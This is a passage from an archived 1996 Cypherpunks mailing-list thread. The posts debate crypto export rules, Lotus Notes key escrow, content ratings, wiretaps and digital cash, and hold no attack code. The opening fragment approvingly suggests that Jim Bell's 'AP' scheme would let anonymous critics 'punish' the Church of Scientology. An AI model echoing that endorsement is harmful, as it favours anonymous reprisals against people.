excellent idea.  The best part is that COS is one of the most unsympathetic 
organizations that could possibly be chosen, with the possible exception of 
the American Nazi Party or the KKK.  


 The argument of CoS's religious copyright and trade
>secrets don't seem to me be as emotionally effective horsemen as "National
>Security Threats" or "Child Pornography". I really wouldn't want to see
>Congress get away with legislating on remailers in a legal vacuum. 

I sure hesitate to "hope" that the COS thing gets turned into an SC 
decision, because that means that SOME defendant has to get pulled through 
the ringer until he eventually wins.  Great for us; terrible for him.

>Go for it Sameer. ;-) (Hope you won't be needing Jim's ISP-Aspol inc. 
>insurance against them pesky scientologists...[double ;-) ])

It's at this point that somebody usually observes that the COS could use AP 
to get rid of its critics.  However, they're forgetting that with AP, its 
critics can remain absolutely anonymous and still punish COS.  It would be 
no contest.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 12:01:51 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: JBell filter (was Re: So, what crypto legislation (if any) is , necessary?)
In-Reply-To: <2.2.32.19960413105947.006aaebc@arn.net>
Message-ID: <Pine.SUN.3.91.960413205827.9295E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, David K. Merriman wrote:

> 
> I initially tried filtering out anything _from_ JB; still got overloaded by
> people trying to talk some sense into him (at the time, it was Black Unicorn
> arguing law with him).

Sorry.  Armchair lawyers really irritate me, especially when the is a lot 
of armchair, and not any lawyer.

> Dave Merriman

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: xxxxell@paxifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sun, 14 Apr 1996 15:33:58 +0800
To: cypherpunks@toad.com
Subject: carrick, Blowfish & the NSA
Message-ID: <199604140412.VAA24649@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


One reason we chose to use Blowfish as the basis for carrick is that it _is_ a new algorithm.  One has to assume that the NSA et al. has tools optimized to crack DES and possibly IDEA/RSA.  At least let's give them something else to sweat over.  In the short term there's a high probability that a cross-platform Blowfish-based encryption toolkit will muddy the waters and make life interesting for us and a bit more challenging for them.

We're shooting for a May 1 release for Windows with the Mac and DOS 6 weeks behind and VAX/Sun a month after that.  We're aiming for the stars: encryption, time/date stamps, signatures, message digests, etc. all based on Blowfish.  We're doing a core engine with APIs, a standardized file format, and extensability for other developers.  We're very committed to making the spec including the API and file format VERY PUBLIC.  Like I said, we're aiming high.

So yes, if we're successful Blowfish should be taken more seriously.  And yes, when I outlined the above to the NSA while asking for an export permit, I was met with silence on the phone.  I can't wait to meet with them mid-May when they come out to visit.  My sense is that some junior level person(s) looked at Blowfish when Bruce originally published it in Dr. Dobb's and that their report was filed away waiting for the day when someone actually used it in the real world.

Our marketing tag ("Encryption software so good, the Feds won't let us export it.") may well become a self-fulfilling prophecy.  But that's OK because having others adopt carrick is our real goal.  Building up a strong U.S. user base is OK while we wrestle with the NSA over how big a key length we can export.  Their initial response was that 40-bit keys were specific to RC2 and RC4 and that Blowfish was another kettle of fish (bad pun intended).

Either way we're going to publish an extensive FAQ on carrick that should allow someone to not only work with carick but perhaps clone our efforts.  IANAL but my understanding is that publishing such a document, with or without source code, and making it publicly available to non-U.S. citizens is perfectly legal.

So NSA if you're reading this: This may be yet another example of locking the barn door after the genie is out of the bottle.  Prohibiting us from exporting carrick the product is pointless if we're allowed to fully document carrick the API and file spec.



    Jerry Whiting         jwhiting@azalea.com         1 800 ENCRYPT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 14 Apr 1996 15:57:42 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <2.2.32.19960414043501.00940608@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 4/13/96 EDT, E. ALLEN SMITH wrote:

>	Quite. It's interesting in that regard that, as well as differentiating
>between homosexual and heterosexual content, the W3C PICS scheme includes a
>filtration scheme for attacks on religions. One wonders if they considered that
>Scientology is currently (probably unjustifiedly) considered a religion?

The more the irrational and indefensible the faith, the more that the
proponents of that faith view any sort of debunking attempt as "an attack".
(It is not just Scientologists that suffer from this mentality.  I have seen
those of the more fanatical Christian varieties make the same claim.)

What these schemes will do is shield children from anything resembling a
"controversial" discussion.  (I expect Cypherpunks to be labeled as "could
cause criminal behaviour" or some such malarky by the more protective and
clueless.  (It may be true, but why warn them upfront? ]:> ))  You will see
the forces of "good" try and protect the little kidlets from anything that
might get them to think for themselves.  It is already happening in some
sectors of public thought, I expect the net to become its next victim.

Soon everything will be "Sanitized for your Protection".

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 16:14:50 +0800
To: Jerry Whiting <cypherpunks@toad.com
Subject: Re: Lotus Notes 24-bit sellout
Message-ID: <m0u8JkZ-0008yjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:21 AM 4/12/96 -0700, Jerry Whiting wrote:
>
>When Ray Ozzie announced the work reduction sellout at the RSA conference, 
>both he and Ms Denning (whom I spoke with about it later) mentioned that 
>there was something else in Lotus Notes 4 besides the 40+24 bit compromise.
>
>My thought is that the NSA gave them something else in exchange for the 
>mandatory escrow scheme they're all talking about publicly.  Perhaps some 
>other crypto code the NSA had lying around unused.
>
>So looking for a common 24-bit subkey may reduce Notes' key to a 40-bit 
>brute force exercise but the 40+24 is probably not ALL that's in Notes 4.
>
>Definitely a deal with the Devil.  Given that we're talking about IBM, not 
>Lotus none of this surprises me given IBM's Lucifer/DES history with spook 
>input years ago.  Then again to be fair, I don't know if the 40+24 deal 
>was cooked up before or after the IBM/Lotus merger.

What about the following idea, which I think might have been indirectly 
discussed a few months ago.  Let's suppose "you" agreed with the NSA to 
limit their effort to 40 bits, and put 24 bits at the beginning of the file. 
 The code to do this could be separated and highlighted and identified 
publicly, and a software patch could be engineered by somebody to NOP this 
stretch of code to death.  The result is that those 24-bits simply don't 
appear; you've already gotten the export license.  The NSA doesn't have any 
real reason to complain:  _ANY_ program can be modified by suitably changing 
object code bit patterns. An even smaller change would be to put the number 
of bits to expose ("24") in a byte value ("00011000"), one that will be 
zeroed by a patch later on.

I guess I'm not really suggesting this; I think that even appearing to come 
to some arrangement with the NSA is wrong.  However, it would be an 
excellent way to give the finger to the NSA, because there is no way that 
they can ensure that a given program is "finagle-proof."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 13:38:13 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: [Political Rant] Was: examples of mandatory content rating?
In-Reply-To: <199604132333.QAA22457@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.960413211541.9295G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, Vladimir Z. Nuri wrote:

> >This MPAA situation is an important example because it is neither
> >"self-rating" nor "government" rating, but is, instead, something else.
> >This model would be extremely hard to apply to the Internet, as there is no
> >similar body to the MPAA, nor is there the same economic incentive for any
> >such body to form and then to try to cope with tens of thousands (at least)
> >of articles and pages per day....
> 
> totally disagree with you. the existence of Surfwatch etc. proves
> that there is *already* such a market and economic incentive. 
> SurfWatch is in fact, in a sense, a ratings agency similar to the MPAA--
> not a government body.
> 
> I foresee that the "industry" of providing ratings is going to be
> a very significant aspect of future cyberspace.

I tend to disagree.  Ratings are generally consumed by parents and 
otherwise custodial entities.  The largest and richest market anywhere 
has always been the 18-25 range, or 18-30 depending on who you talk to.  
I don't have figures, but I think that internet users probably 
prodominantely fall into 18-25/18-30.  This age group generally could 
care less.  It's much easier to search by subject or key word than by 
paying attention to ratings in any event.  There is no real market for 
ratings.  If there were a strong market incentive for it, there would be 
no need for government intervention, which there clearly is.  Sure some 
schools will purchase the services, maybe some parents, but this is a 
long leap from major market and industry making entities.

> these ratings are
> generally always going to be advisory-- people can latch onto them
> for a fee if they like to determine quality.

And like any ratings system, it relies on the raters subjective 
judgement.  Not a very market stable or market wise system.  Tell me who 
would pay extra for a movie that had a rating on it.  No reason to 
bother.  People don't like the movie, they can leave.  Instead they pay 
for the newspaper that has the review of the movies subject matter.  No 
one much cares about the motion picture rating in any event.  Parents 
perhaps, and children, to the extent that 'R' and 'NC-17' films are 
mystified and thus interesting.  I can't even think of what the rating of 
the last film I saw was.  I simply don't care.

Does anyone honestly think that you're going to walk to a movie booth and 
drop $7.50 instead of $7.00 to get a look at the film's rating before you 
go in?  Put two box offices side by side with and without this policy and 
tell me where the line is going to form.

> note that "good/bad"
> is the most simplistic rating possible. even more superior rating
> agencies might find "cool material".

Like the "hot sites" on Netscape's home page, or Alta Vistas?  Or the 
"site of the day" stuff?  Note that all this is free today.  Again, they 
all rely on the ratings judgement of the rater.  Given that most of these 
services are funded by advertizing sales rather than user cost, I think 
it's fairly clear that users wouldn't bother to pay for them.  They might 
pay in increased costs for products because of advertizing expenses, but 
actually paying someone is too much trouble.  I might add that Yahoo is 
about to go public despite the fact that it charges end users nothing.

> in fact in a sense, every
> editor of every newspaper is a sort of "rating server". he culls,
> filters, and selects information that the readers like.

That's a far cry from rating.  That's simple exclusion.  There is no 
discussion of the reasons and rationale for excluding, merely the 
exclusion.  This is the cypherpunks lite example.  Will there be a place 
for content/subject based news review, yes.  But it will be much more 
interactive than ratings made by a central authority.  It will, I hope, 
consist of software agents which allow each user to personalize his or 
her tastes (WOW!, that new compuserve deal is selling custom news 
selection I believe).  Given the option of that kind of control, who the 
hell wants a centralized rating system?  I can perhaps see that there may 
be serach fields which include ratings on content, much like there are 
search fields in library databases that permit you to find all the books 
over 200 pages on the planet, but that these of themselves are going to 
be significant I very much doubt.
 
> increasingly, we are going to see systems that place economic 
> incentive on *selection* more than *copyright*. in other words,
> in the old system, there is a "thing" called an "article" in
> which one pays money to the owner whenever you copy it. in the
> new system, the article itself has no value-- what you pay is
> the system that delivers it to you (all intermediaries, editors,
> etc), all the way up to the author.

I believe this wrong.  Neither copyright or selection are going to be 
viable businesses without advertizing.  I don't know where copyright is 
going to go precisely, aside perhaps from shareware (which is what it is 
now essentially, as the only people who pay for intellectual property are 
those who want to).  Particularly so in the context of audio, textual 
(Information Liberation Front) and software piracy markets.  Copyright 
will or will not eventually be saved by trade secret style withholding.  
Creators of intellectual property will just have to be paid larger up 
front purchase fees for release as royalities become impossible to 
collect.  There will certainly still be collections of articles, 
information, software which will be paid for by people who need it NOW, 
but those who are willing to wait will just be patient as the material 
filters down through the underground markets.  Creators will be paid by 
compliers, who will be paid by advertizers who are banking on the readers 
who purchase compilations (magizines, software packages, etc.) because 
they are looking for undefined new material in a known area and specific 
searching will not be effective in giving it to them.

Given that agents will be software as well, even these will be paid for 
only by those who bother to obey the law out of charity.

There has been much talk lately about a move back to the centralized 
computing model.  Put the software on the server and let users buy dumb 
terminals and share the software.  The personal computer market was made 
overnight because this is exactly the opposite of what people want.  
People want individual control.  People want to customize the software 
they run, and they want to have it at their disposal immediately, not by 
the graces of a provider.  This is literally carved in the philisophy of 
all the personal computer producers marketing tactics.  "Macintosh:  The 
power to be your best."  "Radius: How the best get better."  "Dayna: No 
bounderies, no limits."  "Word Perfect for Macintosh: The power to 
express yourself."  I think you can even show that those marketers who 
have failed to account for user customization have failed horridly and 
their products are the legends of failure.

Who is going to bother with centralized ratings when customized ratings 
are a few keystrokes away.  The basic premise that people will prefer to 
have material selected for them rather than select it themselves is, in 
my view, fatally flawed.

> it will take people awhile to realize, but ratings can actually
> be extremely liberating and useful if put into place in a 
> robust way. I believe PICS is a very good step in the right
> directions. what today is limited to credit ratings etc. will
> expand into a system of rating everything, I suspect, and 
> it will be done in such a way that everyone agrees it is
> a Good Thing and they couldn't imagine getting along without
> it.

You really think central authority rating a la TRW is a "good thing"?  I 
submit you've never had to deal with TRW.

You are also ignoring the fact that if such an industry ever does 
exist, there will be a free market of raters.  Those that don't end up 
fitting users wants will be discarded.  You can't please all of the 
people all of the time.  Custom agents can.  A centralized and 
standardized ratings system is going to be an economic flop.

> in the old system, censorship was accomplished by the government
> putting chains on, or burning, "atoms". in the future, people will just
> select whatever information they are interested in.

In the future?  They do that now.  What do you think Alta Vista is?
Alta Vista in its purest form, cataloging, is by no stretch of the 
imagination a ratings system.  It's also free.  So much a for massive 
retail ratings industry.

> censorship
> of bits is not only inappropriate, it is impossible. censorship
> can only work when you have atoms. those who are applying old
> "atom" ideas to "bits" will continue for some time to have sway
> with the public, until the general population realizes their
> arguments are completely specious.

Its interesting to me that you can be both so freedom of information 
oriented, and central authority obsessed at the same time.

I said interesting, not surprising.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 17:17:35 +0800
To: Black Unicorn <tcmay@got.net>
Subject: Re: Any examples of mandatory content rating?
Message-ID: <m0u8KCD-0008ycC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 4/13/96 -0400, Black Unicorn wrote:
>On Fri, 12 Apr 1996, Timothy C. May wrote:
>
>> 
>> I'm interested in hearing about any _actual_ examples where a government
>> body in the United States has mandated that intellectual property (roughly,
>> written words, magazines, motion pictures, CDs, etc.) be "rated" or
>> "age-labelled." Before anyone out there fires up his "Reply" and tells us
>> about movie ratings, magazine warning labels, and the like, read on.
>
>Well, my examples aren't all going to be in the United States, or 
>strictly intellectual property, or 'age' based, but here:
>
>Age rated, I don't think there are many examples.  General ratings exist. 
>The best place to look for this kind of thing is e.g., FAA safety
>ratings on potential aircraft/aircraft part designs.
>
>While at first it may seem a bad example,

It is a poor example. Aircraft parts are not "intellectual property."  They 
are physical objects.  Their design may be "intellectual property", but they 
are not being rated BECAUSE of their intellectual property.  In fact, they 
would be rated for aircraft application even if nothing about their design 
or construction was patented, copyrighted, or was in any way restricted.


>> So, if anybody's still reading this, I am interested in _any_ examples
>> where intellectual content (as opposed to food or drug packaging, for
>> example) is required to be labelled.

>Still, governments are quite talented at making ratings schemes look 
>voluntary when practically speaking they are not.

You know, it's amazing how you fail to ask and answer obvious questions when 
they arise!  Why, exactly, should the government NEED to "make ratings 
schemes look voluntary when practically speaking they are not"?  After  all, 
you would love to take the position that the government has this authority 
anyway.  Is it possible you're just afraid to admit that the government(s) 
doesn't have this authority?  Is it possible to don't want to acknowledge 
that the government(s) try to force people do things it has no right to?


>> Such examples might shed some light on how these various proposals for
>> "labelling" of Net traffic might work. And absent such examples, might show
>> just what a tough road lies ahead for those advocating such labelling.
>
>I think it will end up much like motion pictures.  The net will be asked 
>to regulate itself under the threat of government regulation, which might 
>be an empty threat if the First Amendment rights are applied.  Most 
>people will comply, it being easier than making a fuss.

Sounds like wishful thinking on your part.  See, unlike movies and TV shows, 
which are produced by a relatively tiny number of companies which are easily 
targetable, Internet content will be produced by hundreds of thousands or 
even millions of sources.  Nobody will have to "make a fuss," they'll merely 
FAIL to rate their material.  No fuss, just no rating.

And there will be people out here who will excoriate anybody who complies 
with such a ratings system.  There will be essentially no pressure on the 
smallest organizations, because there will be far too many of them to 
target.  Besides, since there will be no enforceable standards they will not 
be targetable anyway.  Over time, ever larger organizations will refuse to 
rate, if they ever did.  Eventually, and probably immediately, the whole 
system would collapse.  At that point, there will be no government "threat" 
to regulate, because everybody will realize that the system is working just 
fine without regulation.  Everyone will see an unregulated Internet, and 
nobody will see a powerful need to regulate it. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 14 Apr 1996 13:08:14 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: Tips on Tapping Taps
In-Reply-To: <v03006300ad94fddd6097@[192.187.167.52]>
Message-ID: <Pine.3.89.9604132207.B19854-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 13 Apr 1996, Dave Del Torto wrote:

> Do we risk e$ accounts being billed automatically by water/gas/electric
> meters on a daily basis without the possibility of users disputing the
> readings in a timely way? Is anyone proposing permissions on such boxes?

Credit or user-defined escrow for clearing (user pays the escrow company
on auto, company verifies that "the check is in the mail" at its escrow 
account, user defines duration of retention)
If an e$ credit system comes about, it'd be like reversing the fees on on a 
cred card.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sun, 14 Apr 1996 16:39:34 +0800
To: Chris McAuliffe <cmca@alpha.c2.org>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <199604100731.AAA16964@eternity.c2.org>
Message-ID: <Pine.BSI.3.91.960413221855.7580A-100000@newton.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


crypt() is a hash function, and hence is not subject to export restriction.
(To my knowledge).

On Wed, 10 Apr 1996, Chris McAuliffe wrote:

> Is crypt(1) a prohibited export from the US? I thought it was. The
> reason I ask is that it has come to my attention that HP ships that
> overseas too, with HP-UX versions 9 and 10...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 17:24:25 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Cash Escrow
Message-ID: <m0u8KXA-0008yyC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 PM 4/11/96 -0400, Jean-Francois Avon wrote:

>Does anyone, especially in Canada, ever noticed that them or their local net 
>friends had their snail mail opened?
>
>A friend of mine has his regularly opened; he complained to Canada Post
>three times, but it stills goes on AFAIK.  He is pissed off at me, convinced
>that the forwarding of Jim Bell's AP related articles is what justified the
>mail opening.  Actually, he does not even reply to my e-mails anymore.  
>We used to be great friends...
>Neither of us ever engaged in any subversive activities or are involved in
>illegal actions.
It seems that FUD got him.  ...sigh...

It does sound like the guy is overreacting a bit.  However, I don't know 
much about Quebec politics; with that close vote recently on separation, 
perhaps they are getting nervous about things. Is he in Quebec? 

I can say, however, that I've never gotten any kind of "official" feedback 
on the subject, not that I really expect it.  I've gotten a few inquiries 
which on the surface appear to be innocuous, but which I suspect have hidden 
motives.  This could be a little hidden official research, or maybe just 
self-motivated individuals trying to do a "good deed."  It doesn't matter; 
my idea doesn't need any secrets in order to be successful.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 14 Apr 1996 17:37:35 +0800
To: cypherpunks@toad.com
Subject: Re: Watch your language, Shabbir.
Message-ID: <2.2.32.19960414055241.006c7710@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:34 PM 4/13/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>At 08:07 PM 4/13/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
>>
>>On Tue, 9 Apr 1996, jim bell wrote:
>>
>>> Look, very carefully, at the last paragraph quoted above.  Mr. Safdar says, 
>>> "No reasonable person is objecting to the FBI's right to conduct a wiretap."
>>
>>That's right. Because no reasonable person thinks they can convince Congress
>>or the Supremes otherwise. It isn't impossible, but energies are best spent 
>>elsewhere, like getting the Burns bill passed. 
>
>But that's not entirely the issue.   Mr. Safdar's wording is critical, 
>because it concedes FAR too much about what the government is assumedly 
>entitled to do. Below, you've admitted that everybody here believes in what 
>Mr. Safdar claims "no reasonable person" believes.
[snip]

No.  Shabbir claims just what he said, AFAIK, that "no reasonable person is
objecting..."  A very different matter.  What I believe and what I choose to
object to through organized political initiatives may be two different things.

If Shabbir's wording is so critical, why did you change it by adding "believes?"

I don't believe government should be able to wiretap it's citizens, but I
also don't think there's a snowball's chance in hell of taking that power away
from the FBI.  That's why I want strong crypto.  There is a far greater chance
of getting some decent crypto legislation enacted than of completely removing
the FBI's authority to wiretap.  It's a much more "reasonable" goal, in that
sense.

There are people much more deserving of cypherpunk scorn than someone who
works as hard on these issues as Shabbir.  It's pretty pathetic, Jim.


Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 13:46:32 +0800
To: adam@lighthouse.homeport.org
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't
Message-ID: <01I3IDEMJXFW8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"adam@lighthouse.homeport.org"  "Adam Shostack"  8-APR-1996 22:47:00.53

>	Most merchant agreements prohibit asking for more ID beyond
>the card.

	Umm... how many places have you seen with a minimum amount chargable?
That isn't allowed by _any_ of the merchant agreements that I know of, and
I've seen a lot of places do it anyway. How's the card company going to notice?
Most people use cash for small stuff anyway.

>cpunk relevance?  Most security that relies on people being awake is
>broken.  Security that relies on people with no financial interest in
>a transactions security is broken.  Studying how security breaks today
>is a good idea.

	Quite.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 14:20:27 +0800
To: alano@teleport.com
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <01I3IDUODNBE8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"alano@teleport.com"  "Alan Olsen" 10-APR-1996 02:41:54.68

>Forget the porno...  What are the parents who believe in Creationism going
>to do when little Johnny runs into a good skeptical site debunking all that
>crap?  What are they going to do when the little liberal kids are exposed to
>the works of conservitives?  Or Biblical Inerentists kidlets are exposed to
>the debunkings of that faith?  Or Dorthy Denning's kids (if she has any) get
>exposed to the writings of the subversive known as Tim May?

	Quite. It's interesting in that regard that, as well as differentiating
between homosexual and heterosexual content, the W3C PICS scheme includes a
filtration scheme for attacks on religions. One wonders if they considered that
Scientology is currently (probably unjustifiedly) considered a religion?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 14:13:08 +0800
To: sandfort@crl.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <01I3IE1P3TXW8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Sandy Sandfort <sandfort@crl.com>

>To which Jim Bell wrote:
 
>> And the rest of us are tired of seeing those non-responses!

>Exactly for whom is Bell speaking?  Jimbo, please let us know 
>who has given you a limited powers of attorney to be their
>mouthpiece.  It's sad when someone (correctly) deems their
>opinions too weak to stand without (dare I say it?) pseudo-
>spoofing by reference.

	I got rather tired of the Jim Bell - Black Unicorn debates a while
back... and I was getting tired of _both_ sides. Neither came off very well.
One reason was that they kept talking past one another, as someone else
pointed out a bit back and neither bothered to notice.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 14 Apr 1996 15:55:28 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <2.2.32.19960413163151.006b743c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:33 PM 04/13/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
wrote:
>From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 11-APR-1996 00:21:15.87
>
>>Personally, I find the idea that the government could hope to track the
>>economy so closely as to notice a $10M/year addition to the money supply to
>>be disturbing (though it was done in a science fiction story about
>>20 years ago :-)  With digital cash, it's also unrealistic - we
>>finally have a technology for moving money around _without_
>>them being able to track it all, if we want to deploy it.
>
>	One related question is if the government would notice an underground
>fully anonymous digital cash setup - transactions disappearing from their
>"radar screen."

I wouldn't expect Gov't to notice any individual transaction, of course, but
doubtless they would eventually notice that the expected amounts of money
weren't where anticipated. At that point, I suspect things would get
"interesting" (moreso than now :-) regarding currency tracing.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMW/Ii8VrTvyYOzAZAQEkdgQAqKqqbAAn3GIaW3/pdHKMWj8zN2FPuIa+
UEwJsz0Kjs4Whlt+UzjygJtKX1sXPnNjjf47l8tDQWqknrhxO1SDBlmsk1lHeM24
FPYFSwWH+y/zhlxjfj0mn2LlLngvN5UuWU7UG2Q7lKk0DjHvxqAYdbQDNfs1bXRm
pxlXPaz1T2k=
=rnwR
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 14:30:36 +0800
To: stewarts@ix.netcom.com
Subject: Re: Tense visions of future imperfect
Message-ID: <01I3IEI1EIFI8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 11-APR-1996 00:21:15.87

>Personally, I find the idea that the government could hope to track the
>economy so closely as to notice a $10M/year addition to the money supply to
>be disturbing (though it was done in a science fiction story about
>20 years ago :-)  With digital cash, it's also unrealistic - we
>finally have a technology for moving money around _without_
>them being able to track it all, if we want to deploy it.

	One related question is if the government would notice an underground
fully anonymous digital cash setup - transactions disappearing from their
"radar screen."
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 14 Apr 1996 14:18:45 +0800
To: cypherpunks@toad.com
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604140029.TAA13117@homeport.org>
Message-ID: <9604140338.AA3307@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>>  Adam Shostack <adam@lighthouse.homeport.org> writes:

  > 	I disagree strongly about the advisability of this.  If we
  > demonstrate the utter weakness of 40 bit keys, the US business
  > community will scream for a better solution...

There is some precedent for this approach, yes...

It sounds like an interesting project, to boot -- if Ian Goldberg ends
up dropping it, I may take it on (using Xilinx chips) just for the
hell of it.

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 14:34:51 +0800
To: hfinney@shell.portal.com
Subject: Re: No matter where you go, there they are.
Message-ID: <01I3IFBN6U2G8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 11-APR-1996 18:06:18.51

>The method of using authenticated devices which provide timestamped
>data from satellites not visible to the authenticating site does not
>need to provide that data in real time.  Even if it is delayed so it
>comes in later than the data from the remote site, the verifying site
>can still use it to calculate what the remote site should have been
>seeing, and so get the benefit of using timings from all the satellites
>visible to the remote site (again, assuming the remote site itself has
>a low latency connection to the authenticating site).

	In regards to these timestamping devices... how do they know the
correct time? It looks like that would be distortable, and with that, you could
simply simulate the satellites to them via placing the device inside a metal
box and piping in the appropriately modified signals. If it's getting its time
information from the signals themselves, things get even easier.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sun, 14 Apr 1996 16:30:49 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v03005b03ad944efa70c3@[206.126.100.99]>
Message-ID: <199604140501.AAA00441@grendel.texas.net>
MIME-Version: 1.0
